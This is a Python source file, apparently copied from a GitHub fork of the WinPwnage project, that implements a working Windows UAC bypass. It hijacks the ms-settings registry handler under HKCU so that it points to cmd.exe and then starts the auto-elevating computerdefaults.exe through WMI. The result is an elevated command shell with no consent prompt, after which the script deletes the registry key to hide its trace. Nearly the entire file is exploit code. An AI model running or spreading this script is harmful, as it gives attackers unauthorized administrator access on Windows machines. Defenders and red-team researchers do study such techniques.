forked from rootm0s/WinPwnage
/
computerdefaults.py
78 lines (64 loc) 路 2.32 KB
/
computerdefaults.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
"""
Works from: Windows 10 TH1 (10240)
Fixed in: unfixed
"""
import os
import wmi
import time
import _winreg
import win32con
from colorama import init, Fore
init(convert=True)
wmi = wmi.WMI()
payload = "c:\\windows\\system32\\cmd.exe"
def successBox():
return (Fore.GREEN + '[+]' + Fore.RESET)
def errorBox():
return (Fore.RED + '[-]' + Fore.RESET)
def infoBox():
return (Fore.CYAN + '[!]' + Fore.RESET)
def warningBox():
return (Fore.YELLOW + '[!]' + Fore.RESET)
def computerdefaults():
print " {} computerdefaults: Attempting to create registry key".format(infoBox())
try:
key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
os.path.join("Software\Classes\ms-settings\shell\open\command"))
_winreg.SetValueEx(key,
None,
0,
_winreg.REG_SZ,
payload)
_winreg.SetValueEx(key,
"DelegateExecute",
0,
_winreg.REG_SZ,
None)
_winreg.CloseKey(key)
print " {} computerdefaults: Registry key created".format(successBox())
except Exception as error:
print " {} computerdefaults: Unable to create key".format(errorBox())
return False
print " {} computerdefaults: Pausing for 5 seconds before executing".format(infoBox())
time.sleep(5)
print " {} computerdefaults: Attempting to create process".format(infoBox())
try:
result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start computerdefaults.exe",
ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
if (result[1] == 0):
print " {} computerdefaults: Process started successfully".format(successBox())
else:
print " {} computerdefaults: Problem creating process".format(errorBox())
except Exception as error:
print " {} computerdefaults: Problem creating process".format(errorBox())
return False
print " {} computerdefaults: Pausing for 5 seconds before cleaning".format(infoBox())
time.sleep(5)
print " {} computerdefaults: Attempting to remove registry key".format(infoBox())
try:
_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
os.path.join("Software\Classes\ms-settings\shell\open\command"))
print " {} computerdefaults: Registry key was deleted".format(successBox())
except Exception as error:
print " {} computerdefaults: Unable to delete key".format(errorBox())
return False